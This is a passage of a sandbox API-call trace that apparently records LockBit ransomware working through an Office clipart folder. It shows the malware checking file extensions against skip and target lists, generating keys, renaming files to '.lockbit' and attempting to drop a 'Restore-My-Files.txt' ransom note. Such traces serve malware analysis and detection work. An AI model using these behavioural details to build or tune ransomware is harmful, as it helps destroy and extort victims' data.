lpString2=".WMF") returned -1 [0124.145] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0124.145] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0124.145] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0124.145] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0124.145] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0124.145] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0124.145] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0124.145] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0124.145] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0124.145] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0124.145] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0124.145] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0124.145] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0124.145] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0124.145] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0124.145] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0124.146] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0124.146] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0124.146] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099184.WMF") returned 1 [0124.146] lstrcmpiW (lpString1="ntldr", lpString2="J0099184.WMF") returned 1 [0124.146] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099184.WMF") returned 1 [0124.146] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099184.WMF") returned -1 [0124.146] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099184.WMF") returned -1 [0124.146] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099184.WMF") returned 1 [0124.146] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099184.WMF") returned -1 [0124.146] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0124.146] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099184.WMF") returned=".WMF" [0124.146] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0124.146] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0124.146] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0124.146] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0124.146] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0124.146] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0124.146] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0124.146] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0124.146] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0124.146] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0124.146] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0124.147] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0124.147] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0124.147] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0124.147] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0124.147] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0124.147] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0124.147] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0124.147] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0124.147] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0124.147] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0124.147] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0124.147] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0124.147] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0124.147] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0124.147] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0124.147] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0124.147] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0124.147] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099184.WMF.lockbit") returned 72 [0124.147] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099184.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099184.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0124.148] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0124.148] malloc (_Size=0x40068) returned 0x3df0008 [0124.148] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=4118) returned 1 [0124.148] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.149] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.149] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0124.149] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.149] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.149] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0124.149] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0124.151] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099184.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099184.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0124.151] malloc (_Size=0xa6) returned 0x77d7a8 [0124.151] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0124.152] free (_Block=0x77d7a8) [0124.152] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099184.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0124.152] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0124.152] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0124.152] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x65dd0810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0xcd2, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099185.JPG", cAlternateFileName="")) returned 1 [0124.152] lstrcmpiW (lpString1=".", lpString2="J0099185.JPG") returned -1 [0124.152] lstrcmpiW (lpString1="..", lpString2="J0099185.JPG") returned -1 [0124.152] PathFindExtensionW (pszPath="J0099185.JPG") returned=".JPG" [0124.152] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0124.152] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0124.152] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0124.152] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0124.152] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0124.152] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0124.152] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0124.152] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0124.152] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0124.152] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0124.153] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0124.153] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0124.153] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0124.153] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0124.153] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0124.153] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0124.153] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0124.153] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0124.153] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0124.153] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0124.153] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0124.153] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0124.153] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0124.153] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0124.153] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0124.153] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0124.153] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0124.153] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0124.153] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0124.153] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0124.153] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0124.153] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0124.153] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0124.153] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0124.153] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0124.153] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0124.153] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0124.153] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0124.154] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0124.154] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0124.154] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0124.154] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0124.154] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0124.154] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0124.154] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0124.154] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0124.154] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0124.154] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099185.JPG") returned 1 [0124.154] lstrcmpiW (lpString1="ntldr", lpString2="J0099185.JPG") returned 1 [0124.154] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099185.JPG") returned 1 [0124.154] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099185.JPG") returned -1 [0124.154] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099185.JPG") returned -1 [0124.154] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099185.JPG") returned 1 [0124.154] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099185.JPG") returned -1 [0124.154] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0124.154] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099185.JPG") returned=".JPG" [0124.154] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0124.154] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0124.154] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0124.154] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0124.154] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0124.154] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0124.154] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0124.154] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0124.154] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0124.154] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0124.155] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0124.155] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0124.155] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0124.155] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0124.155] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0124.155] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0124.155] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0124.155] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0124.155] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0124.155] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0124.155] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0124.155] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0124.155] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0124.155] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0124.155] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0124.155] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0124.155] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0124.155] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0124.155] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099185.JPG.lockbit") returned 72 [0124.155] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099185.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099185.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0124.156] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0124.156] malloc (_Size=0x40068) returned 0x3d70450 [0124.156] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=3282) returned 1 [0124.156] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.156] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.156] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0124.156] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.157] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.157] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0124.157] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0124.161] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099185.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099185.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0124.161] malloc (_Size=0xa6) returned 0x77d7a8 [0124.161] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0124.161] free (_Block=0x77d7a8) [0124.161] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099185.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0124.161] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0124.161] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0124.162] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x183cef00, ftCreationTime.dwHighDateTime=0x1bdbf74, ftLastAccessTime.dwLowDateTime=0x562fb9d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x183cef00, ftLastWriteTime.dwHighDateTime=0x1bdbf74, nFileSizeHigh=0x0, nFileSizeLow=0x4162, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099186.JPG", cAlternateFileName="")) returned 1 [0124.162] lstrcmpiW (lpString1=".", lpString2="J0099186.JPG") returned -1 [0124.162] lstrcmpiW (lpString1="..", lpString2="J0099186.JPG") returned -1 [0124.162] PathFindExtensionW (pszPath="J0099186.JPG") returned=".JPG" [0124.162] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0124.162] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0124.162] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0124.162] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0124.162] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0124.162] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0124.162] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0124.162] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0124.162] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0124.162] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0124.162] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0124.162] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0124.162] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0124.162] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0124.162] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0124.162] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0124.162] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0124.162] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0124.162] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0124.162] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0124.162] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0124.162] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0124.162] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0124.162] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0124.163] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0124.163] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0124.163] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0124.163] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0124.163] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0124.163] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0124.163] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0124.163] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0124.163] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0124.163] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0124.163] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0124.163] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0124.163] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0124.163] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0124.163] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0124.163] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0124.163] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0124.163] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0124.163] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0124.163] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0124.163] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0124.163] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0124.163] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0124.163] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099186.JPG") returned 1 [0124.163] lstrcmpiW (lpString1="ntldr", lpString2="J0099186.JPG") returned 1 [0124.163] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099186.JPG") returned 1 [0124.163] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099186.JPG") returned -1 [0124.163] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099186.JPG") returned -1 [0124.163] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099186.JPG") returned 1 [0124.164] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099186.JPG") returned -1 [0124.164] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0124.164] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099186.JPG") returned=".JPG" [0124.164] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0124.164] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0124.164] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0124.164] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0124.164] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0124.164] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0124.164] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0124.164] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0124.164] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0124.164] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0124.164] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0124.164] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0124.164] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0124.164] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0124.164] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0124.164] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0124.164] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0124.164] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0124.164] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0124.164] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0124.164] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0124.164] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0124.165] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0124.165] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0124.165] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0124.165] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0124.165] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0124.165] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0124.165] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099186.JPG.lockbit") returned 72 [0124.165] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099186.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099186.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0124.165] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0124.165] malloc (_Size=0x40068) returned 0x1ff1e60 [0124.166] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=16738) returned 1 [0124.166] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.166] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.166] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0124.166] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.167] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.167] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0124.167] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0124.170] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099186.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099186.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0124.170] malloc (_Size=0xa6) 